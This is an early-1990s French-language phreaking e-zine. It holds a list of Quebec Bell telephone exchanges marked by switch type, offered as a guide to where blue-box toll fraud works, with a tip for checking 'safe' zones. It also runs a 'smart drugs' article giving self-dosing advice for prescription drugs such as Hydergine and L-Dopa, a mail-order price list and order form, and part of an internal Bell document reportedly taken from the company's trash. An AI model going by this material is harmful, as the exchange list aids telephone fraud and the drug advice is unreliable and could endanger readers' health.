448 x MANSONVILLE 292 x MARIEVILLE 460 x MASCOUCHE-ANGLAIS 467-968 x MASCOUCHE-DUPRAS 474-966 x MIRABEL-AEROPORT 476 x MIRABEL-ST-AUGUSTIN 475 x MIRABEL-STE-SCHOLA. 258 x MONKLAND 369-481-2-3-4-5-6-7-8-9 LAMA MONKLAND (Tel cel.) 497-591-4-944-5-7-952-983 LAMA MONTREAL-NORD 321-2-3-4-5-6-7-8-852-955 LAMA MONTREAL-NORD 327-9 x MORIN HEIGHTS 226 x NAPIERVILLE 245 x OKA 479 x ONTARIO (42CG1) 281-2-4-5-6-8-842 x ONTARIO (42CG4) 287-841-7-8-863-499-982-7-350 LAMA ONTARIO (42CG2) 496-280-283 LAMA ONTARIO 840-3-4-5-9-289-985 LAMA ORMSTOWN 829 x PAPINEAU 523-4-7-8-790-859 LAMA PAPINEAU 521-2-5-6-9-596-7-8-599 LAMA PAPINEAU 941-4-5-7-952 LAMA PIERREVILLE 568 x POIN. TREMBLES-51e 498-642-4 x CENTRAL NNX P 5 E S D N N S N D - X S P M 5 5 A J M A B S 1 S - - - 9 S - 10 1 2 1 2 100 POIN. TREMBLES-8e 640-5 x POIN. TREM.-RIV. PR 643-8 x POIN. TREM.-RIV. PR 494-881 LAMA POIN. CLAIRE-ST-ANN 457 x POIN. CLAIRE-ST-JOH 630-426-428-695-7 LAMA PONT-VIAU 662-3-7-8-9-629-967-975 x RAWDON 834 x RIGAUD 451 x RIVIERE BEAUDETTE 269 x ROXBORO 683-4-5-421 LAMA STE-ADELE 229 x ST-ALPHONSE DE ROD. 883 x ST-ANDRE E. 537 x STE-ANNE DS PLAINES 478-838 x ST-BARTHELEMY 885 x ST-BLAISE 291 x ST-BRUNO 461-653 x ST-BRUNO 441 x ST-CALIXTE 222 x ST-CESAIRE 469 x ST-CHRYSOSTOME 826 x ST-CLET 456 x ST-CONSTANT 632-8 x ST-CONSTANT 635 x ST-DAMASE 797 x CENTRAL NNX P 5 E S D N N S N D - X S P M 5 5 A J M A B S 1 S - - - 9 S - 10 1 2 1 2 100 ST-DENIS 787 x STE-DOMINIQUE 270-1-2-3-4-6-7-8-9-495-948 LAMA ST-EUSTACHE 472-3-491 x ST-EUSTACHE 623-974 LAMA ST-FELIX DE VALOIS 889 x ST-GAB. DE BRANDON 835 x STE-GENEVIEVE 620-6 x STE-GENEVIEVE 624-696 LAMA ST-HIPPOLYTE 563 x ST-HYACINTHE 773-4 x ST-HYACINTHE 771-8 LAMA ST-JACQUES 839 x ST-JEAN DE MATHA 886 x ST-JEAN LEBEAU 348-9 x ST-JEAN LEBEAU 359 x ST-JEAN-ST-JACQUES 346-7-357-8 LAMA ST-JEROME 431-8-565-9 x ST-JEROME 432-6 x STE-JULIE VERCHERE 649 x STE-JULIENNE 831 x STE JUSTINE 764 x ST-LAMBERT-ELM 465-6-671-2-923 LAMA ST-LAMBERT-ST-HUBER 443-5-462-676-926 LAMA ST-LAMBERT-ST-HUBER 656-678 x ST-LAURENT 744-7-8-835 RLM CENTRAL NNX P 5 E S D N N S N D - X S P M 5 5 A J M A B S 1 S - - - 9 S - 10 1 2 1 2 100 ST-LAURENT 283 RLM ST-LIN 439 x STE-MADELEINE 795 x ST-MARC 584 x STE-MARGUERITE 228 x STE-MARTHE 459 x STE-MARTINE 427 LAMA ST-MICHEL 374-6-593-721-2-3-5-7-8-9 LAMA ST-MICHEL SAINTS 833 x ST-PAUL ABBOTSFORD 379 x ST-PAUL L'ERMITE VOIR VILLE LE GARDEUR STE-PIE DE BAGOT 772 x STE-PIE-DE-GUIRE 784 x ST-POLYCARPE 265 x ST-REMI 454 x STE-ROSE 622-5-8-963 LAMA ST-SAUVEUR 227 x ST-THEODORE 882 x STE-THERESE-EGLISE 430 x STE-THERESE-EGLISE 433-4-5-7-979 x STE-THERESE-OUIMET 621-975 LAMA ST-VINCENT PAUL-FAB 661-4 x ST-VINC. PAUL-RIV P 665 x ST-ZEPHIRIN 564 x ST-ZENON 884 x CENTRAL NNX P 5 E S D N N S N D - X S P M 5 5 A J M A B S 1 S - - - 9 S - 10 1 2 1 2 100 SAUVE 381-3-5-7-8-9-858 LAMA SAUVE 382-4 x SAUVE 386-592-942-3-9-951-3-984 LAMA SHAWBRIDGE 224 x SHERBROOKE 252-3-5 x SHERBROOKE 251-4-6-7-9-899 LAMA SHERBROOKE 283 RLM SOREL 742-3 x SOREL 746 LAMA SUTTON 538 x TERREBONNE 471-492 x TERREBONNE 964 LAMA VALLEYFIELD 371-3 x VALLEYFIELD 370-7 x VARENNES 652 x VAUDREUIL 424-455 x VERCHERES 583 x VERDUN 362-761-2-5-6-7-8-9-888-976 LAMA VILLE LE GUARDEUR 581-5 x VILLE LE GUARDEUR 582-654-7 LAMA WATERLOO 539 x YAMASKA 789 COTEAU DU LAC 763 x COTEAU LANDING 267 x COTE-DES-NEIGES CG1 340-3-4-345-731-2-4-5-9 LAMA CENTRAL NNX P 5 E S D N N S N D - X S P M 5 5 A J M A B S 1 S - - - 9 S - 10 1 2 1 2 100 COTE-DES-NEIGES CG0 341-2-736-7-8 LAMA COTE-DES-NEIGES 283 RLM COWANSVILLE 263 x COWANSVILLE 266 x CRABTREE 754 x DORVAL VOIR LACHINE-DORVAL DUDEMAINE 330-1-2-3-4-5-6-7-8-9-741-5-832-856 LAMA DUDEMAINE (COPS) 851-3-749 & 957 LAMA DUNHAM 295 x EASTMAN 297 x FARNHAM 293 x FRANKLIN CENTRE 827 x FRELIGHSBURG 298 x GRANBY 375-8-776-7 x GRANBY VICTORIA 372 x HEMMINGFORD 247 x HENRYVILLE 299 x HOWICK 825 x HUDSON 458 x HUNTINGTON 264 x ILE PERROT 425-453 x JOLIETTE 752 LAMA JOLIETTE 753-6 x JOLIETTE 755-9 x KNOWLTON 242 x CENTRAL NNX P 5 E S D N N S N D - X S P M 5 5 A J M A B S 1 S - - - 9 S - 10 1 2 1 2 100 KNOWLTON 243 x LACHINE-DORVAL 422-631-3-6 LAMA LACHINE-14e Ave. 634-7-9 LAMA LACHUTE 562 x LACOLLE 246 x LANORAIE 887 x LAPRAIRIE 444-659 x LASALLE 363-5-6-8-595 LAMA LASALLE 364-7 x L'ASSOMPTION 589 x LAVAL-EST 688 x LAVAL OUEST-PRINC. 689 x LAVAL OUEST-PRINC. 969 LAMA LAVAL OUEST-SAUVE 627 x LAVAL OUEST-SAUVE 962 x LAVALTRIE 586 x L'EPIPHANIE 588 x LES CEDRES 452 x x LONGUEUIL-ST-I. 442-463-646-651-670-4-7-9-928 LAMA ST-URBAIN 639 x SACRE-COEUR 236 x SAULT-AUX-MOUTONS 231 x SQUATEC 855 x STONEHAM 848 RLM STRATFORD 443 x CENTRAL NNX P 5 E S D N N S N D - X S P M 5 5 A J M A B S 1 S - - - 9 S - 10 1 2 1 2 100 TADOUSSAC 235 x THETFORD MINES 334-5-8 LAMA TRING JONCTION 426 x TROIS PISTOLES 851 x VALCARTIER 844 x VILLE DEGELIS 653 x ACTONVALE 546 x ANJOU 351-2-3-4-5-6-493 x ATWATER 930-3-7-8-9-936-854-846 LAMA ATWATER 931-2-4-5-951 x -6-8-9 BEAUHARNOIS 429 x BEAUHARNOIS 225 x BEDFORD 248 x BELMONT 390-3-6-874-9 x 954 BELMONT 392-5-9-876-7-8 LAMA BELMONT 394-7-8-868-870-1-2-5 LAMA BELMONT 861-6-864-873 LAMA BELMONT 390-391 LAMA BELOEIL 464-7 x BELOEIL 446 x BERTHIERVILLE 836 x BOUCHERVILLE 449-641-655 x BROMONT 534 x BROWNSBURG 533 x CHAMBLY 447-658 RLM CENTRAL NNX P 5 E S D N N S N D - X S P M 5 5 A J M A B S 1 S - - - 9 S - 10 1 2 1 2 100 CHATEAUGUAY 591-2-8 x CHATEAUGUAY 699 LAMA CHOMEDEY 681-2-6-7-8-973 LAMA CLARENCEVILLE 294 x METABETCHOUAN 349 x MILOT 373 x MONTAPICA 467 x NORMANDIN 274 x N.D. DES LAURENTIDE 849-841 x N.D. DU LAC 899 x PARC LAURENTIDES 846 x PERIBONKA 374 x PET.RIV.ST-FRANCOIS 632 x RIVIERE BLEUE 893 x RIVIERE DU LOUP 862-7-8 x ROBERVAL 275 x ST-ALEXANDRE DE K. 495 x ST-AMBROISE 672 x ST-ANDRE DE K. 493 x STE-ANNE BEAUPRE 827 x STE-ANNE PORTNEUF 238 x STE-BRIGITTE LAVAL 825 x STE-CATHERINE 875 x ST-CYRILLE 527-681-2-3-4-6-7-8 LAMA ST-ELEUTHERE 859 x CENTRAL NNX P 5 E S D N N S N D - X S P M 5 5 A J M A B S 1 S - - - 9 S - 10 1 2 1 2 100 ST-FELICIEN 679 x ST-FERDINAND D'H. 428 x ST-FEREOL 826 x ST-FIDELE 434 x STE-FOY 651-3-7-8-9670 LAMA STE-FOY (CGO) 563-4-650-2-4-656 LAMA ST-FULGENCE 674 x ST-GEDEON 345 x ST-HILARION 457 x ST-HONORE 673 x ST HONORE DE TEM. 497 x ST-IRENEE 452 x ST JEAN DE DIEU 963 x ST-JEAN ILE ORLEANS 829 x ST-LEON DE CHIC 481 x ST-NICOLAS 831 x ST-NICOLAS 836 x ST-PACOME 852 x ST-PASCAL DE K. 492 x STE-PETRONILLE 828 x ST-PHILIPPE DE NERI 498 x ST-PRIME 251 x ST-REAL 528-641-643-4-6 LAMA RLCM ST-REAL 529-640-7-8-9-691 RLCM ST-REAL 521-2-3-4-5 x CENTRAL NNX P 5 E S D N N S N D - X S P M 5 5 A J M A B S 1 S - - - 9 S - 10 1 2 1 2 100 ST-ROMUALD 834 x STE-ROSE DU NORD 675 x ST-SIMEON 638 x ST-TITE DES CAPS 823 x AEROPORT BAGOTVILLE 677 x ALBANEL 279 x ALMA 662-8-9 x ANCIENNE LORETTE 871-2-4-7 x ANSE ST-JEAN 272 x BAIE STE-CATHERINE 237 x BAIE ST-PAUL 435 x BEAUPORT 661-3-4 x BEAUPORT 660-6-7 x BERGERONNES 232 x BIENCOURT 499 x BLACK LAKE 423 x BOISCHATEL 822 x CABANO 854 x CHAMBORD 342 x CHARLESBOURG 621-2-3-4-6-7-8-890-976 LAMA CHARNY 832 x CHICOUTIMI 545-9-690-3-8 LAMA CHICOUTIMI 543-5-6 x CHUTE DES PASSES 377 x CLERMONT 439 x CENTRAL NNX P 5 E S D N N S N D - X S P M 5 5 A J M A B S 1 S - - - 9 S - 10 1 2 1 2 100 D'AIGUILLON 692-4 LAMA DESBIENS DELISLE 347 x DOLBEAU 276 x EAST BROUGHTON 427 x ESCOUMINS 233 x FERLAND 676 x GARTHBY 458 x GIRARDVILLE 258 x HEBERTVILLE 343-4 x ILE AUX COUDRES 438 x INVERNESS 453 x JONQUIERE-MELLON 548 x JONQUIERE-ST-JACQUE 542-7-695 x LA BAIE 544-697 x LAC BOUCHETTE 348 x LA DORE 256 x LA MALBAIE 665 x LA POCATIERE 856 x LATERRIERE 678 x LEEDS 424 x LES EBOULEMENTS 635 x LEVIS 833-5-7-8 x L'ISLE VERT 898 x LORETTEVILLE 842-3-5-7 x LUSKVILLE 455 CENTRAL NNX P 5 E S D N N S N D - X S P M 5 5 A J M A B S 1 S - - - 9 S - 10 1 2 1 2 100 LYSTER 389 x MAGOG 843-7 x MAGOG 868 x MANIWAKI 449 x MANQUANE 971 x MASKINONGE 227 x MONTEBELLO 423 x NOMININGUE 278 x NORTH HATLEY 842 x N.D. DE LOURDES 385 x PAPINEAUVILLE 427 x PERKINS 671 x PLESSISVILLE 362 x POINTE GATINEAU 561-8 x POINTE GATINEAU 243-6 x POSTE DE BALEINE 929 x POVUNGNITUK 988 x QUAQTAQ 492 x QUYON 458 x RICHMOND 826 x ROCK FOREST 564-821 x ROCK ISLAND 876 x SALLUIT 255 x ST-ADOLPHE D'HOWARD 327 x ST-ADOLPHE DUDSWELL 887 x CENTRAL NNX P 5 E S D N N S N D - X S P M 5 5 A J M A B S 1 S - - - 9 S - 10 1 2 1 2 100 STE-AGATHE 324-5-8 x ST-BONIFACE 535 x ST-DONAT 424 x ST-FAUSTIN 688 x ST-FELIX KINGSLEY 848 x ST-GERMAIN GRANTHAM 395 x ST-GUILLAUME 396 x ST-JOVITE 425 x ST-MALO 658 x ST-MATHIEU 532 x STE-MONIQUE 289 x ST-PIERRE WAKEFIELD 457 x ST-PIERRE BECQUETS 263 x ST-SEBASTIEN FRONT 652 x STE-SOPHIE LEVRARD 288 x SAWYERVILLE 889 x SCOTSTOWN 657 x SHAWINIGAN 5e 536-7 x SHAWINIGAN DES H. 539 x SHERBROOKE 346-562-3-5-6-7-9 x SHERBROOKE 564-620-621-2-3-9 x SOUTH DURHAM 859 x STOKE 878 x TASIUJAQ 633 x THURSO 985 x CENTRAL NNX P 5 E S D N N S N D - X S P M 5 5 A J M A B S 1 S - - - 9 S - 10 1 2 1 2 100 TROIS-RIVIERES O. 377 x TROIS-RIVIERES 374-5-6 x TROIS-RIVIERES 370-1-2-3-8-9-380-891-3 LAMA UMIUJAQ 331 x VAL DAVID 322 x VICTORIAVILLE 751-2-8 LAMA WAKEFIELD MASHAM 456 x WAKEFIELD VALLEY 459 x WAKEHAM BAY 338 PBX 711 WATERVILLE 837 x WEEDON 877 x WICKHAM 398 x WINDSOR 845 x WOTTON 828 x YAMACHICHE 296 x Alors, 668 d'Asbestos, tu peux en thorie faire du blue-box de chez toi. Cette liste tait date du 31 janvier 93, ce qui porte croire que peu de changements risquent de se produire au cours des prochains mois. Ceci dit, il existe un moyen "low-tech" pour vrifier si vous demeurez dans une zone relativement "safe" pour faire du bluebox: demandez tout simplement votre tlphoniste locale si vous pouvez bnficier de l'option "transfert d'appels", de votre "area code". Les mmes systmes qui ne peuvent pas dtecter les tones DTMF illgaux ne peuvent pas non plus offrir ce service. Pour tous ceux qui ne sont pas encore en mesure d'apprcier cette liste, c..d. les dbutants du phreak, nous sommes dj en train de prparer un article sensationel sur les fonctions propres CHACUNS des systmes de Bell. Ca va tre hot! Mais n'oubliez pas, les tout-p'tits: frauder le Bell est illgal! YE! C'EST JUSTEMENT LE DOCUMENT QUE NOUS AVIONS PERDU! -(- ENTER PHUN CO -)- by l0gRuS! ( Sung to the air of Enter Sandman, by Metallica) Say your prayers, PD's ones NpC's not gone And we're there for long You thought you were, free to sin That NpShit had won But again you'd been wrong Sleep with your deck open Gripple your modem thight... Exit Light (Bbs) Enter Wild Get down there CHoRUS To The WorkShop of what never ends Something's wrong Encrypt philes RCMP tonight And other lames that bites... Dreams of wars, Dreams of Trashs Dreams of Deckering Fast And of Cyberspace's lights.. Sleep with Toneloc open Keep your board trojan-tight CHoRUS + Get down.. Now i lay, down to sleep Pray the Lord NpC for keeps If NpC dies, before i awake Pray the Lord anarchy remains.. Hush little lame, don't say a word And never mind that noise you heard It's just the Staff under your bed A Zip-Gun pointed at your head.. Exit Light Enter Wild Bell's afraid Exit Light Enter Wild Take my hand To the WorkShop of what never ends [( End of song )] : Can be remplaced by Mephisto, 9-1-1, Dynamix, Morin, Lamers at will.. NOUS AUSSI, NOUS SAURONS VOUS FAIRE CHANTER SMART DRUGS REDUX par Coaxial Karma "Drugs that boost intelligence..." Aprs l'article de Blitzkreig sur les smarts drugs (voir NPC #2), voici l'article y faisant suite... Pour les "cyberpunks", les "hackers" et les "phone phreaks", la ralit est quelque chose qui doit tre rehausse, change, ou ajuste ses besoins. La ralit est infinie; la seule chose qui nous limite dans ce monde est notre cerveau. Cependant, il existe plus d'un moyen pour surpasser ces limites; soit en augmentant vos capacits cognitives, soit en augmentant vos capacits mnmoniques, soit en amliorant les changes au niveau synaptique (ce qui vous permettra d'avoir plus de contrle sur vous-mme: rsistance au stress, rsistance la fatigue...), soit en librant des hormones, telle la vasopressine, qui fera ragir votre cerveau en consquence de celle-ci. Dans cet article, je parlerai des trois neurotransmetteurs principaux, et des effets causs par l'hydergine. I- Les Neurotransmetteurs Les scientifiques ont dcouvert que les cellules du cerveau (les neurones) communiquaient entre elles par le biais de substances chimiques spciales, appeles neurotransmetteurs, qu'elles fabriquent. L'aptitude apprendre, se souvenir, se nourrir, dormir, prouver des motions dpend de l'aptitude de nos cellules fabriquer ces neurotransmetteurs, les porter aux autres cellules du cerveau et, aussi, rpondre aux messagers chimiques manant des autres cellules crbrales. A mesure que notre cerveau vieillit, il ne parvient plus fabriquer ces messagers chimiques essentiels et y ragir. Or, il est possible, dans certains cas, d'augmenter la quantit de ces neurotransmetteurs afin de ramener le fonctionnement du cerveau un niveau voisin de celui, caractristique, d'individus jeunes ou au dbut de la maturit. Notre cerveau produit ces neurotransmetteurs partir des substances nutritives dans nos aliments. Par exemple, l'actylcholine est un neurotransmetteur ncessaire aux lments du cerveau qui commandent les motions primitives, telles les pulsions sexuelles et le degr de raction des stimulants extrieurs (l'veil par rapport au sommeil par exemple). Il y joue aussi un rle trs important au niveau de la mmoire, de l'apprentissage, de la planification long terme. Le cerveau produit de l'actylcholine partir de la choline prsente dans les aliments (entre autres le poisson) et de la lcithine (sous forme de choline phosphatidyle). Pour que la choline soit transforme en actylcholine, nous devons fournir des quantits abondantes de vitamines B5 (Pantothnate de calcium ou acide pantothnique). Attention, le bitartre de choline, la forme la plus rpandue de choline, peut donner la diarrhe. Les doses recommandes de choline phosphatidyle pour obtenir une amlioration aux niveaux mnmonique, cognitif et autres, sont de 3 5 grammes chaque jour, et pour obtenir les mmes rsultats avec de la lcithine, les doses doivent tre de 80 grammes chaque jour (dpendemment du pourcentage de choline contenu dans la lcithine). Les rsultats devraient tre perus au bout de quelques jours. Par contre, la choline prsente quelques inconvnients pour certains (surtout quand la lcithine est rance), car les bactries dans l'appareil intestinal la transforment parfois en une substance odeur de poisson assez dsagrable appele trimethylamine. Cependant, vous pouvez vous en dbarrasser en modifiant les bactries de vos intestins par l'ingestion de yogourt, de fibres alimentaires supplmentaires et de supplments de vitamines. Le lvartrnol, appel aussi norpinphrine (NE), est un autre neurotransmetteur du cerveau qui joue un rle important au niveau de l'instinct et des motions, telles les pulsions sexuelles, de la mmoire et de l'aptitude apprendre. Le cerveau produit du lvartrnol partir de la phnylalanine et de la tyrosine, des acides amins prsents dans la viande, les oeufs, et le fromage, entre autres. La phnylalanine aide notre cerveau remplacer le NE manquant. Lorsqu'on se sent vid mentalement, c'est peut-tre parce qu'on a puis les rserves de NE et que le cerveau ne parvient pas les remplacer. On peut bel et bien refaire le plein avec celle-ci. Pour que la transformation de tyrosine et de phnylalanine en NE aie bien lieu, nous devons fournir en quantit abondante des vitamines C et B6. Les doses recommandes pour obtenir de bons rsultats varient de 100 1000 mg par jour, pendant deux semaines. On obtient de meilleurs rsultats si celui-ci est pris jeun, le soir avant de se coucher, ou ds son rveil le matin. Toutefois, la tyrosine pourrait agir sur la pression artrielle, provoquant l'hypertension chez les uns et l'hypotension chez les autres. MISE EN GARDE: Les individus prenant les puissant inhibiteurs MAO ne devrait pas prendre, ni de la phnylalanine, ni de la tyrosine. La dopamine est un autre important neurotransmetteur qui commande aussi l'instinct sexuel et d'autres motions, le mouvement corporel, la facult des tissus de crotre, de se rparer, le systme immunitaire et l'humeur. Le systme dopaminergique est l'un des systmes qui dcline le plus sous l'effet du vieillissement. La lipofuscine, pigment de vieillissement, de la mme substance que les taches de vieillissement cutanes, se forme trs rapidement avec l'ge dans les systmes dont le fonctionnement dpendent de la dopamine. La L-Dopa, acide amin partir duquel le cerveau fabrique la dopamine, permet d'augmenter la dure de vie chez les animaux en laboratoire d'environ 50 pour cent. La L-Dopa est un excellent antioxydant, tant un catchol, et a t utilis comme protection contre les radiations haute nergie. Pour viter de fcheuses consquences, on l'emploie avec les lments antioxydants tel que: Vitamine E, C, B1, B5, Zinc, Slnium, et de l'Hydergine). MISE EN GARDE: L'usage de la L-Dopa, phnylalanine ou de la tyrosine en doses importantes peut, toutefois, acclrer la croissance d'un mlanome pigment malin dj existant. Voila pour ce qui est des neurotransmetteurs. Maintenant, voici la deuxime partie qui sera consacr l'Hydergine (de Sandoz). II- L'Hydergine L'Hydergine (de Sandoz) est un mdicament d'ordonnance apte rtablir le fonctionnement crbral chez des personnes ges souffrant de snilit des degrs plus ou moins levs, ou amliorer la fonction crbrale chez les sujets humains normaux. Administre en doses quotidiennes de 12 mg pendant seulement deux semaines, l'Hydergine a provoqu une amlioration de la vigilance lmentaire et de la fonction cognitive suprieure chez des sujets volontaires normaux. Il agit aussi comme remontant, un peu comme la cafine, sans ses effets secondaires sur l'humeur et les nerfs. En outre, l'Hydergine stimule la production d'axones par le cerveau, liens qui permettent aux neurones de communiquer entre eux et dont on a besoin pour apprendre. Ce mdicament est trs renomm parce qu'il permet d'accrotre notre intelligence et ensuite parce qu'il retarde jusqu' quatre fois l'accumulation de lipofuscine dans les cellules crbrales. Il agit aussi sur les systmes nerveux noradrnergique (NE) et dopaminergique du cerveau. Le systme dopaminergique est reli aux motions, la motivation, aux activits autonomes du tronc crbral, aux pulsions propres l'ambition et l'agressivit, la faim et au manger, la pulsion sexuelle, l'instinct du territoire, l'activit motrice et la stimulation de la scrtion d'hormones, comme l'hormone somatotrope ou de croissance. Le facteur naturel de croissance hormonale (FNC) du cerveau et l'Hydergine semblent emprunter le mme cheminement biochimique pour provoquer la croissance des axones. Un traitement base d'Hydergine exige quotidiennement environ de 12 20 mg pour un minimum de six mois deux ans pour rgnrer les axones de faons raliser une amlioration optimale des fonctions mentales. Cependant, un petit conseil, si vous aimeriez suivre ce traitement, je vous recommande de prendre de l'Hydergine sublinguale. Voici pourquoi: Si vous prenez de l'Hydergine par voie buccale, vous en perdez 20 pour cent qui sont limins dans les excrments, le foie dtruisant ensuite 40 pour cent, ce qui n'en laisse que 40 pour cent pour le reste du corps, dont le cerveau. Par contre, administre sous forme sublinguale, l'Hydergine est fournie au cerveau en quantit beaucoup plus abondante. Il serait sage cependant de commencer le traitement avec de faibles doses au dbut, pour viter les maux de ttes. L'Hydergine peut aussi tre utile pour traiter l'hypoglycmie par son action stabilisatrice sur la raction du cerveau l'apport d'nergie, le cerveau tant la partie du corps la plus sensible l'abaissement du taux sanguin du glucose. P.S. Voici maintenant la liste des produits d'Interlab ainsi que les prix. Et dire qu'on fait gratuitement... - ADRAFINIL 40 X 300 MG TABLETS $32.00 120 X 300 MG TABLETS $115.00 - AMPHOTERICIN (ORAL) 40 X 250 MG CAPSULES $24.00 160 X 250 MG CAPSULES $85.00 - ARCALION (SULBUTIAMINE) 30 X 200 MG TABLETS $19.00 130 X 200 MG TABLETS $69.00 - BIOSTIM 8 X 1 MG TABLETS $12.00 32 X 1 MG TABLETS $42.00 - CENTROPHENOXINE 60 X 250 MG TABLETS $20.00 240 X 250 MG TABLETS $64.00 - DHEA 90 X 50 MG CAPSULES $26.00 360 X 50 MG CAPSULES $95.00 - DEPRENYL 100 X 2.5 MG TABLETS $38.00 300 X 2.5 MG TABLETS $96.00 - DEPRENYL 100 X 5 MG TABLETS $70.00 300 X 5 MG TABLETS $180.00 - ETHOXYQUIN 100 X 50 MG CAPSULES $18.00 400 X 50 MG CAPSULES $62.00 - FENOZONOLE (ORDINATOR) 30 X 10 MG TABLETS $14.00 120 X 10 MG TABLETS $50.00 - FIPEXIDE (VIGILATOR) 30 X 200 MG TABLETS $19.00 120 X 200 MG TABLETS $70.00 - FLUCONAZOLE 1 X 150 MG CAPSULE $22.00 7 X 50 MG CAPSULES $51.00 - HYDERGINE ORAL 100 X 5 MG TABLETS $36.00 400 X 5 MG TABLETS $130.00 - HYDERGINE SUBLINGUAL 100 X 4.5 MG TABLETS $32.00 400 X 4.5 MG TABLETS $115.00 - IDEBENONE (AVAN) 10 X 30 MG TABLETS $42.00 40 X 30 MG TABLETS $150.00 - KH3 (PROCAINE) 100 X 50 MG TABLETS $12.00 400 X 50 MG TABLETS $45.00 - L-DOPA (SINEMET) 100 X 110 MG TABLETS $29.00 - MELATONIN 100 X 3 MG CAPSULES $24.00 400 X 3 MG CAPSULES $86.00 - MINAPRINE (CANTOR) 30 X 100 MG TABLETS $30.00 120 X 100 MG TABLETS $108.00 - PARLODEL (BROMOCRYPTINE) 30 X 2.5 MG TABLETS $22.00 - PIRACETAM 60 X 800 MG TABLETS $18.00 240 X 800 MG TABLETS $64.00 - PHENYTOIN 250 X 100 MG TABLETS $12.00 1000 X 100 MG TABLETS $44.00 - PROPRANOLOL 500 X 10 MG TABLETS $16.00 - RETIN A/EFFEDERM 0.05% 30 GRAM TUBE $9.00 4 X 30 GRAM TUBES $32.00 - RETIN A 0.01% 15 GRAM TUBE $9.00 4 X 15 GRAM TUBES $32.00 - RIBAVIRIN (VIRAZOLE) 10 X 100 MG CAPSULES $48.00 40 X 100 MG CAPSULES $172.00 - ROXITHROMYCINE 10 X 150 MG TABLETS $32.00 - VASOPRESSIN NASAL SPRAY 12 ML BOTTLE $32.00 4 X 12 ML BOTTLES $112.00 - VINPOCENTINE 90 X 5 MG TABLETS $32.00 360 X 5 MG TABLETS $115.00 - XANTHINOL NICOTINATE 90 X 300 MG CAPSULES $14.00 360 X 300 MG CAPSULES $48.00 - ZOVIRAX CREAM 5% 2 GRAM TUBE $17.00 4 X 2 GRAM TUBES $60.00 P.S. "ALL PRICES ARE US DOLLARS AND PAYMENT IS ONLY ACCEPTED IN US DOLLARS" Pour conclure cet article, je vais vous donner l'adresse d'Interlab au cas ou vous auriez envie de commencer un traitement l'Hydergine... INTERLAB BCM BOX 5890 LONDRES, WC1N 3XX ANGLETERRE Voici aussi un exemple de bon de commande: PRODUCT PRICE QTY AMOUNT PIRACETAM 60 X 800 MG TABLETS $18.00 2 $36.00 ... SUB TOTAL $ 36.00 - AIR MAIL POST ADD SHIPPING $10.00 OR ACCELERATED AIR MAIL POST ADD $15.00 (LES PRIX SONT ENCORE EN DOLLARS US) - PLEASE NOTE: ADD ONE ONLY OF THE POSTAL CHARGE AS REQUIRED, FAILURE TO ADD EITHER SHIPPING CHARGE WILL RESULT IN GOODS BEING SENT VIA SURFACE MAIL, APPROXIMATELY 10 WEEKS DELIVERY TIME TOTAL AMOUT ENCLOSED $ 36.00 (+ SHIPPING CHARGE) MAKE CHECK AND MONEY ORDERS PAYABLE TO INTERLAB ALL PRODUCTS SUPPLIED TO OUR STANDARD TERMS AND CONDITIONS, AVAILABLE ON YOUR WRITTEN REQUEST. MAIL YOUR ORDER TO: INTERLAB, BCM BOX 5890, LONDON, WC1N 3XX, ENGLAND. PLEASE SEND MY ORDER TO THE FOLLOWING: (PLEASE PRINT CLEARLY) NAME: _______________________________ ADDRESS: __________________________________________________ __________________________________________________ ZIP/POST CODE: ____________ COUNTRY: __________________ THE SECTION BELOW MUST BE COMPLETED AND SIGNED IN ORDER THAT WE CAN SHIP YOUR ORDER; PLEASE CHECK - HAVE YOU FILLED IN THE NAME AND ADDRESS SECTION CORRECTLY ? I HEREBY DECLARE THAT THESE PRODUCTS ARE FOR MY OWN USE AND NOT FOR COMMERCIAL RESALE. FURTHER, I DECLARE THAT THIS SUPPLY DOES NOT EXCEED THREE MONTHS USAGE AND THAT NO THERAPEUTIC CLAIMS HAVE BEEN MADE TO ME BY THE SUPPLIER, I HAVE DISCUSSED THE USE OF THESE ITEMS WITH A PHYSICIAN. Et on continue la semaine prochaine, toujours avec Coaxial Karma, toujours avec les smart drugs... BOUM! QUAND VOTRE MOTEUR FAIT BOUM! LA DPANNEUSE SIMOUN! LES MEDICAMENTS ANTI-SENILITE SONT INTERDITS CHEZ NOUS NOUVEAU SYSTEME DU BELL POUR LES POMPIERS VOLONTAIRES par Blitzkreig Une fois de plus, Northern Phun Co. tient remercier Bell Canada pour sa contribution (bien involontaire) l'dification des masses... Un seul hic, cependant, messieurs du Bell qui, d'aventure, liriez ces lignes: vous ne pourriez-pas laisser traner dans vos poubelles des versions Word Perfect de vos documents sur disquette? Ca nous viterait une grosse job de retranscription. Merci! Et, en passant, nous ne corrigerons pas toutes les fautes de franais dans vos documents. Alors, si vous voulez avoir l'air un peu moins twits, corrigez-les avant de les jeter... Bon, ceci pos, nous avons donc dcouvert, dfaut du nouveau systme 911, un petit quelque chose que le Bell concocte pour les cas d'urgence. Si vous tes un phreaker digne de ce nom, cette information ne sera pas sans vous intresser... Nous sommes tous curieux de connatre le fonctionnement de Bell dans ses moindres dtails, non? OK... Prenons le projet suivant: POMPIERS VOLONTAIRES DEVIS RELATIF A UNE DEMANDE DE FOURNITURE D'UN SYSTEME D'APPEL TELEPHONIQUE DE POMPIERS VOLONTAIRES DESTINE AUX PETITES ET MOYENNES MUNICIPALITS 1- HISTORIQUE Bell canada offre depuis une vingtaine d'annes un service d'appels aux pompiers volontaires destin aux petites municipalits du milieu rural. Ce systme permet d'intercepter la ligne prive des pompiers volontaires et d'y appliquer une sonnerie spciale et facilement identifiable. Lorsque les pompiers rpondent, le prpos peut communiquer directement avec eux l'aide du combin de la console. Au dbut, Bell contrlait assez bien le nombre d'appareils tlphoniques installs chez ses abonns, ce qui n'est plus le cas aujourd'hui. De plus, les municipalits ont vu leur population grandir et ont donc d accrotre le nombre de leurs pompiers volontaires. Mme que dans certains cas, le cot maintenant exorbitant d'une escouade de pompiers permanents, a forc plusieurs grandes municipalits lui joindre un groupe de pompiers volontaires parfois imposant. Tous ces facteurs, plus prenant en compte la dsutude du systme existant, nous conduit regarder la possibilit d'en construire un autre, mieux adapt aux besoins de notre temps. Un systme qui utilisant une technologie moderne, sera plus fiable et donc scurisant pour tout le monde. 2-DESCRIPTION DES COMPOSANTES Le systme se divise en trois parties: 1) La console de contrle quipe d'un combin VLN, qui est installe chez le client. 2) Les ponts de confrences installs dans le central tlphonique. 3) Les circuits de contrle (dcodeur de tonalits, circuits d'interception et de sonnerie) Une description dtaille de l'opration de ces trois lments, est prcise aux pages suivantes de ce document. 2.1- LA CONSOLE La console devra avoir une allure moderne et tre 